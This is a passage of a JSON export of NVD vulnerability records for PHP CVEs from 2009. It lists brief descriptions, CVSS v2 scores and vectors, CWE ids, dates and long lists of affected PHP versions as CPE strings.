"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-4017"], "modified": "2018-10-10T19:48:00", "cpe": ["cpe:/a:php:php:5.2.11", "cpe:/a:php:php:5.3.0"], "id": "CVE-2009-4017", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4017", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:php:php:5.2.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.0:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:31:22", "description": "Unspecified vulnerability in PHP before 5.2.11, and 5.3.x before 5.3.1, has unknown impact and attack vectors related to \"missing sanity checks around exif processing.\"", "edition": 5, "cvss3": {}, "published": "2009-09-22T10:30:00", "title": "CVE-2009-3292", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3292"], "modified": "2018-10-30T16:26:00", "cpe": ["cpe:/a:php:php:4.4.0", "cpe:/a:php:php:4.4.6", "cpe:/a:php:php:5.1.5", "cpe:/a:php:php:4.0.4", "cpe:/a:php:php:5.0", "cpe:/a:php:php:3.0.11", "cpe:/a:php:php:3.0.17", "cpe:/a:php:php:5.0.1", "cpe:/a:php:php:5.2.9", "cpe:/a:php:php:5.2.6", "cpe:/a:php:php:4.4.2", "cpe:/a:php:php:5.1.4", "cpe:/a:php:php:3.0.12", "cpe:/a:php:php:4.4.8", "cpe:/a:php:php:4.4.9", "cpe:/a:php:php:4.0", "cpe:/a:php:php:3.0.15", "cpe:/a:php:php:4.3.6", "cpe:/a:php:php:4.4.3", "cpe:/a:php:php:4.3.0", "cpe:/a:php:php:4.0.2", "cpe:/a:php:php:4.0.7", "cpe:/a:php:php:4.3.7", "cpe:/a:php:php:5.1.3", "cpe:/a:php:php:3.0.16", "cpe:/a:php:php:4.3.4", "cpe:/a:php:php:5.1.6", "cpe:/a:php:php:5", "cpe:/a:php:php:3.0.9", "cpe:/a:php:php:3.0.4", "cpe:/a:php:php:4.3.5", "cpe:/a:php:php:3.0.8", "cpe:/a:php:php:4.2.0", "cpe:/a:php:php:3.0.2", "cpe:/a:php:php:3.0", "cpe:/a:php:php:5.0.2", "cpe:/a:php:php:3.0.1", "cpe:/a:php:php:2.0", "cpe:/a:php:php:4.3.2", "cpe:/a:php:php:3.0.14", "cpe:/a:php:php:4.2", "cpe:/a:php:php:5.2.10", "cpe:/a:php:php:4.4.7", "cpe:/a:php:php:4.3.1", "cpe:/a:php:php:5.2.4", "cpe:/a:php:php:5.1.0", "cpe:/a:php:php:5.2.0", "cpe:/a:php:php:4.3.10", "cpe:/a:php:php:4.2.1", "cpe:/a:php:php:5.0.4", "cpe:/a:php:php:3.0.7", "cpe:/a:php:php:4.0.0", "cpe:/a:php:php:4.3.11", "cpe:/a:php:php:4.1.2", "cpe:/a:php:php:5.2.8", "cpe:/a:php:php:3.0.3", "cpe:/a:php:php:4.4.1", "cpe:/a:php:php:4.1.0", "cpe:/a:php:php:4.0.5", "cpe:/a:php:php:4.3.8", "cpe:/a:php:php:5.1.1", "cpe:/a:php:php:4.4.4", "cpe:/a:php:php:4.3.3", "cpe:/a:php:php:5.2.2", "cpe:/a:php:php:3.0.10", "cpe:/a:php:php:4.3.9", "cpe:/a:php:php:4.0.3", "cpe:/a:php:php:5.0.5", "cpe:/a:php:php:4", "cpe:/a:php:php:4.2.2", "cpe:/a:php:php:3.0.13", "cpe:/a:php:php:3.0.5", "cpe:/a:php:php:4.0.1", "cpe:/a:php:php:5.0.3", "cpe:/a:php:php:4.4.5", "cpe:/a:php:php:5.2.7", "cpe:/a:php:php:3.0.6", "cpe:/a:php:php:2.0b10", "cpe:/a:php:php:5.1.2", "cpe:/a:php:php:4.2.3", "cpe:/a:php:php:1.0", "cpe:/a:php:php:4.1.1", "cpe:/a:php:php:5.0.0", "cpe:/a:php:php:3.0.18", "cpe:/a:php:php:4.0.6"], "id": "CVE-2009-3292", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3292", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:php:php:5.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:patch1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2:*:dev:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:patch2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:2.0b10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta_4_patch1:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.4:patch1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.3:patch1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:rc4:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:rc3:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.9:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:31:22", "description": "The php_openssl_apply_verification_policy function in PHP before 5.2.11 does not properly perform certificate validation, which has unknown impact and attack vectors, probably related to an ability to spoof certificates.", "edition": 5, "cvss3": {}, "published": "2009-09-22T10:30:00", "title": "CVE-2009-3291", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3291"], "modified": "2018-10-30T16:26:00", "cpe": ["cpe:/a:php:php:4.4.0", "cpe:/a:php:php:4.4.6", "cpe:/a:php:php:5.1.5", "cpe:/a:php:php:4.0.4", "cpe:/a:php:php:5.2.1", "cpe:/a:php:php:5.0", "cpe:/a:php:php:3.0.11", "cpe:/a:php:php:3.0.17", "cpe:/a:php:php:5.0.1", "cpe:/a:php:php:5.2.9", "cpe:/a:php:php:5.2.6", "cpe:/a:php:php:4.4.2", "cpe:/a:php:php:5.1.4", "cpe:/a:php:php:3.0.12", "cpe:/a:php:php:4.4.8", "cpe:/a:php:php:4.4.9", "cpe:/a:php:php:4.0", "cpe:/a:php:php:3.0.15", "cpe:/a:php:php:4.3.6", "cpe:/a:php:php:4.4.3", "cpe:/a:php:php:4.3.0", "cpe:/a:php:php:4.0.2", "cpe:/a:php:php:4.0.7", "cpe:/a:php:php:4.3.7", "cpe:/a:php:php:5.1.3", "cpe:/a:php:php:3.0.16", "cpe:/a:php:php:4.3.4", "cpe:/a:php:php:5.1.6", "cpe:/a:php:php:5", "cpe:/a:php:php:5.2.3", "cpe:/a:php:php:5.2.5", "cpe:/a:php:php:3.0.9", "cpe:/a:php:php:3.0.4", "cpe:/a:php:php:4.3.5", "cpe:/a:php:php:3.0.8", "cpe:/a:php:php:4.2.0", "cpe:/a:php:php:3.0.2", "cpe:/a:php:php:3.0", "cpe:/a:php:php:5.0.2", "cpe:/a:php:php:3.0.1", "cpe:/a:php:php:2.0", "cpe:/a:php:php:4.3.2", "cpe:/a:php:php:3.0.14", "cpe:/a:php:php:4.2", "cpe:/a:php:php:5.2.10", "cpe:/a:php:php:4.4.7", "cpe:/a:php:php:4.3.1", "cpe:/a:php:php:5.2.4", "cpe:/a:php:php:5.1.0", "cpe:/a:php:php:5.2.0", "cpe:/a:php:php:4.3.10", "cpe:/a:php:php:4.2.1", "cpe:/a:php:php:5.0.4", "cpe:/a:php:php:3.0.7", "cpe:/a:php:php:4.0.0", "cpe:/a:php:php:4.3.11", "cpe:/a:php:php:4.1.2", "cpe:/a:php:php:5.2.8", "cpe:/a:php:php:3.0.3", "cpe:/a:php:php:4.4.1", "cpe:/a:php:php:4.1.0", "cpe:/a:php:php:4.0.5", "cpe:/a:php:php:4.3.8", "cpe:/a:php:php:5.1.1", "cpe:/a:php:php:4.4.4", "cpe:/a:php:php:4.3.3", "cpe:/a:php:php:5.2.2", "cpe:/a:php:php:3.0.10", "cpe:/a:php:php:4.3.9", "cpe:/a:php:php:4.0.3", "cpe:/a:php:php:5.0.5", "cpe:/a:php:php:4", "cpe:/a:php:php:4.2.2", "cpe:/a:php:php:3.0.13", "cpe:/a:php:php:3.0.5", "cpe:/a:php:php:4.0.1", "cpe:/a:php:php:5.0.3", "cpe:/a:php:php:4.4.5", "cpe:/a:php:php:5.2.7", "cpe:/a:php:php:3.0.6", "cpe:/a:php:php:2.0b10", "cpe:/a:php:php:5.1.2", "cpe:/a:php:php:4.2.3", "cpe:/a:php:php:1.0", "cpe:/a:php:php:4.1.1", "cpe:/a:php:php:5.0.0", "cpe:/a:php:php:3.0.18", "cpe:/a:php:php:4.0.6"], "id": "CVE-2009-3291", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3291", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:php:php:5.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:patch1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2:*:dev:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:patch2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:2.0b10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta_4_patch1:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.4:patch1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.3:patch1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:rc4:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:rc3:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.9:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:31:22", "description": "The posix_mkfifo function in ext/posix/posix.c in PHP before 5.2.12 and 5.3.x before 5.3.1 allows context-dependent attackers to bypass open_basedir restrictions, and create FIFO files, via the pathname and mode arguments, as demonstrated by creating a .htaccess file.\nAccess Complexity selected medium according to the information from X-force link regarding enabling \"open_basedir\" option.\r\n\r\nhttp://xforce.iss.net/xforce/xfdb/53568\r\n\r\n\r\n", "edition": 5, "cvss3": {}, "published": "2009-11-23T17:30:00", "title": "CVE-2009-3558", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3558"], "modified": "2018-10-30T16:26:00", "cpe": ["cpe:/a:php:php:4.0.4", "cpe:/a:php:php:5.2.1", "cpe:/a:php:php:3.0.11", "cpe:/a:php:php:3.0.17", "cpe:/a:php:php:5.2.6", "cpe:/a:php:php:4.4.2", "cpe:/a:php:php:3.0.12", "cpe:/a:php:php:4.4.8", "cpe:/a:php:php:4.0", "cpe:/a:php:php:3.0.15", "cpe:/a:php:php:4.3.0", "cpe:/a:php:php:4.0.2", "cpe:/a:php:php:4.0.7", "cpe:/a:php:php:4.3.7", "cpe:/a:php:php:3.0.16", "cpe:/a:php:php:5.2.5", "cpe:/a:php:php:3.0.9", "cpe:/a:php:php:3.0.4", "cpe:/a:php:php:3.0.8", "cpe:/a:php:php:4.2.0", "cpe:/a:php:php:3.0.2", "cpe:/a:php:php:3.0", "cpe:/a:php:php:3.0.1", "cpe:/a:php:php:2.0", "cpe:/a:php:php:4.3.2", "cpe:/a:php:php:3.0.14", "cpe:/a:php:php:5.2.10", "cpe:/a:php:php:4.4.7", "cpe:/a:php:php:4.3.1", "cpe:/a:php:php:5.3.0", "cpe:/a:php:php:4.3.10", "cpe:/a:php:php:4.2.1", "cpe:/a:php:php:3.0.7", "cpe:/a:php:php:4.0.0", "cpe:/a:php:php:4.3.11", "cpe:/a:php:php:4.1.2", "cpe:/a:php:php:3.0.3", "cpe:/a:php:php:4.1.0", "cpe:/a:php:php:4.0.5", "cpe:/a:php:php:5.1.1", "cpe:/a:php:php:3.0.10", "cpe:/a:php:php:4.0.3", "cpe:/a:php:php:4.2.2", "cpe:/a:php:php:3.0.13", "cpe:/a:php:php:3.0.5", "cpe:/a:php:php:4.0.1", "cpe:/a:php:php:5.0.3", "cpe:/a:php:php:3.0.6", "cpe:/a:php:php:2.0b10", "cpe:/a:php:php:4.2.3", "cpe:/a:php:php:1.0", "cpe:/a:php:php:4.1.1", "cpe:/a:php:php:5.0.0", "cpe:/a:php:php:3.0.18", "cpe:/a:php:php:4.0.6"], "id": "CVE-2009-3558", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3558", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:php:php:4.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:2.0b10:*:*:*:*:*:*:*", 